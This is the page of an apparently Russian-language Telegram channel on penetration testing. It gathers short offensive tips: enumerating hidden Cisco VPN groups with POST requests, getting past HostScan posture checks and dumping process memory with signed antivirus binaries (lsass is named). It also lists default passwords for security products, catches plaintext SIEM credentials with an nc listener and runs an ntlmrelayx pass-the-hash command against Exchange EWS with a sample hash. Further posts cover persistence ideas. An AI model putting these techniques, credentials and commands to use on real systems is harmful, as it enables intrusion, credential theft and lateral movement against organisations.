TGViewer
Channel Public Channel
true_security

true_security

@true_sec

автор и владелец Zer0Way -@Nu11ed09
Subscribers
2.44K
Photos
42
Videos
4
Links
56

Showing posts older than #41 · Back to latest

Older Posts 17 shown
Post #40 1.63K
Опять таки про cisco vpn...
наблюдаю историю когда за одним доменом vpn.company.ru находятся две разные cisco asa c разными настройками.
- У каждой асы свой ssl сертификат, в котором раскрывается серийный номер в поле subject: serialNumber.
- При двух одинаковых get запросах serialNumber разный в ответе....т.е. циски реально две.
- У домена vpn.company.ru две А записи с разными ip адресами.

Одна из цисок запускает модуль posture, а другая нет. То есть одна нас впускает в инфраструктуру без проверок. Как то так случилось что админы настроили циски по разному.
  • 👍 2
Post #39 1.75K
temp.txt421 B
маленький пример списка для енума, все зависит от вашей фантазии. Можно взять список групп который вам виден и к ним добавить "-test", можно взять название компании и сокращения добавляя префиксы it,test,admin и т.д.
  • 🔥 6
Post #38 1.81K
Продолжаем эпопею с cisco vpn.
Есть такая штука как скрытые группы, это группы различных устройств, админские, тестовые и т.п. В данных группах могут быть более широкие доступы. Эти группы не отображаются при подключении и можно к ним подключиться только явно указав в строке подключения клиента, например vpn.company.ru/test_users. К тому же, некоторые компании скрывают вообще веб-интерфейс входа в cisco vpn.

К счастью, название этих групп можно определить перебором. Для определения группы достаточно отправить Post запрос к корню cisco vpn и если код ответа будет равен 200, то профиль существует.

Запрос:
POST /test HTTP/1.1 где test название группы. При наличии группы, в ответе будет содержимое:
<html><script>document.location.replace('/+CSCOE+/logon.html?tgroup=test')</script></html>
Пример результатов перебора на скриншоте, было получено скрытое из интерфейса имя группы test. Зная имена скрытых групп, можно попробовать атаки методом брутфорса/спрея или проверить возможность входа в vpn с использованием тех учетных записей, которые у вас уже есть.
  • 🔥 7
  • 👍 3
Post #36 2.06K
hostscan1.png103.4 KB hostscan2.png234.9 KB
Иногда при пентесте есть валидные креды + есть cisco vpn с модулем hostscan.
Модуль Hostscan используют для проведения проверок на подключаемых устройствах, например что устройство корпоративное (введенно в домен), есть антивирус, стоят обновления и т.д.
Но что делать простому пентестеру если в инфру все таки хочется?
перейти по адресу: https://адрес/CACHE/sdesktop/data.xml и если нам повезет увидеть проводимые модулем hostscan проверки, как на скрине.
что делать если файла нет а проверки есть? запустить process monitor с фильтром на "process name=cscan.exe" и подключиться через клиент anyconnect, ввести любые креды и смотреть что делает приложение.
Изначально приложение соберет информацию об ОС, обновлениях и тд. После ввода любых кред оно начнет "ту самую" проверку(смотреть скрин 2).
Что нам остается делать? правильно - выполнить условия проверки)) имя windows ad домена можно найти, файлы и каталоги можно создать.
Информация не новшество, но пока не столкнешься - не вспомнишь.
Есть ньюанс с проверкой наличия процесса, тут еще нужно подумать.
  • 👍 9
  • 👎 1
Post #28 2.65K
true_security Сегодня в одном чате ребята обсуждали написание статьи про Lolbins. Вот вам один интересный lolbas - C:\Program Files (x86)\Kaspersky Lab\NetworkAgent\kldumper.exe описание - https://support.kaspersky.ru/common/diagnostics/7641 преза от ЛК, где предлагается…
avDump_avast.exe1 MB avDump_avg.exe821.7 KB kldumper.exe4 MB
утилиты для дампа памяти процесса. с подписью антивирусов avg,avast,kaspersky
  • 👍 10
Post #26 2.23K
Иногда для lpe на винде при определённых условиях нужен перезапуск служб/ребут ос. Прав на это нет, но может помочь https://github.com/peewpw/Invoke-BSOD/blob/master/Invoke-BSOD.ps1
Бсодит винду без прав админа, не детектится антивирусами.
GitHub Invoke-BSOD/Invoke-BSOD.ps1 at master · peewpw/Invoke-BSOD For when you want a computer to be done - without admin! - peewpw/Invoke-BSOD
  • 👏 10
  • 👍 2
Post #25 16.7K
Сегодня в одном чате ребята обсуждали написание статьи про Lolbins.
Вот вам один интересный lolbas - C:\Program Files (x86)\Kaspersky Lab\NetworkAgent\kldumper.exe
описание - https://support.kaspersky.ru/common/diagnostics/7641
преза от ЛК, где предлагается сигма правило с исключением данного бинаря из сработки по дампу lsass - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

у kldumper.exe цифровая подпись ЛК. lsass им не дампил еще, но другие процессы дампит ок (при наличии прав лок админа)
  • 👍 1
Post #24 2.38K
У некоторых возникают вопросы, а что даст доступ к определенным средствам защиты в режиме администратора?

начнем с pt vm: как правило, интеграторы и другие вредренцы ленятся тонко настраивать учетные записи в ad для проведения аудитов и дают либо права локального администратора либо вовсе админа домена учетке которую использует сканер. В mp vm есть возможность выполнять powershell команды на аудируемых устройствах, чем собственно вы можете воспользоваться. Создать новую задачу, указать цель, выбрать учетную запись и поехали.

что же касается pt siem: из-за той же самой лени или проблем с руками некоторые дают широкие права учеткам сбора событий. Команды выполнять не получится, пароль учетных записей не посмотреть в веб интерфейсе. Но существует возможность перехватить пароль учетной записи:
- создать новую задачу с профилем Web API Audit
- указать интересующую учетную запись
- ip адрес и порт своего сервера
у себя запустить nc -lvp "порт" и в сиеме запустить задачу. В nc получите креды учетки в открытом виде. С данными кредами у вас намного больше шансов в инфре заказчика. P.S. Это не говоря о паролях в командах и параметрах, если логируют eventid 4688 или 1 (sysmon)

P.s.2. Это не косяки продуктов, это косяки тех кто не меняет пароли и не ограничивает доступ.
  • ❤ 6
  • 🔥 2
  • 😁 2
Post #21 7.68K
на пентестах бывают случаи когда компрометация происходит через средства обнаружения атак и средства защиты....далеко не все фильтруют сетевой доступ к компонентам СЗИ.
Так сказать, спасибо за дефолтные пароли:
- rvision soar/deception/etc... ssh root:pxtm0222; postgres rvision:pxtm0222

- maxpatrol VM: Administrator:P@ssw0rd

- maxpatrol siem: Administrator:P@ssw0rd; rabbitmq: siem:P@ssw0rd или mpx_siem:P@ssw0rd

- pt xdr: Administrator:P@ssw0rd

- pt nad: administrator:P0sitive или administrator:Administr@t0r

- security vision soar: postgres postgres:1q2w#E$R; postgres:sv5platform; rabbitmq sv5_user:sv5platform

- kuma (kaspersky siem): admin:mustB3Ch@ng3d!

Докидывайте дефолтные пароли сзи в комментах)
  • 👍 17
  • 🔥 6
Post #19 2.28K
Интересный способ закрепа в статье https://ipurple.team/2024/01/03/scheduled-task-tampering/ и сама утилита: https://github.com/netero1010/GhostTask

+ а что будет если заменять бинарь? например в таске office automatic updates 2.0?:) или вообще в каталог с бинарем из таски обновления офиса положить свою proxydll с именем msvcp120.dll/msvcp140.dll/msvcr120.dll ?:)

А если изменить в реестре ключ существующей задачи?:)
Purple Team Scheduled Task Tampering The HAFNIUM threat actor is using an unconventional method to tamper scheduled tasks in order to establish persistence via modification of registry keys in their malware called Tarrask. The benefit…
  • ❤ 1
  • 🔥 1
Post #18 2.29K
Крутая тулза для организации socks через rdp соединение, работает практически без детектов. https://github.com/nccgroup/SocksOverRDP

Обратить внимание на строку:
#define SocksOverRDP_CHANNEL_NAME "SocksChannel"
Ну вы поняли☺️
GitHub GitHub - nccgroup/SocksOverRDP: Socks5/4/4a Proxy support for Remote Desktop Protocol / Terminal Services / Citrix / XenApp / XenDesktop Socks5/4/4a Proxy support for Remote Desktop Protocol / Terminal Services / Citrix / XenApp / XenDesktop - nccgroup/SocksOverRDP
  • 👍 6
Post #16 2.46K
true_security list.png
Видео с демонстрацией к посту)

Как подсказал добрый человек, способ уже давно известен и утилита https://github.com/dafthack/MailSniper умеет в эту историю через ключ OtherUserMailbox
  • 🔥 9
  • 👎 1
Post #15 2.41K
Post #14 2.14K
деревенский pass the hash в exchange ews:
- запускаем ntlmrelayx с моим модулем ntlmrelayx.py -smb2support -t https://exchange.com/EWS/exchange.asmx --ews --folder inbox
- в другой консоли на том же сервере smbclient.py domain/user@ipсервера -hashes :13B29964CC2480B4EF454C59562E675C

сами к себе вызываем netntlm аутентификацию с хэшем ntlm и перенаправляем на ews.

Готовых инструментов не видел, за неимением инструмента можно поступить таким образом. Есть mimkatz, но нужна винда и т.д.
  • 🔥 5
Older posts →
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →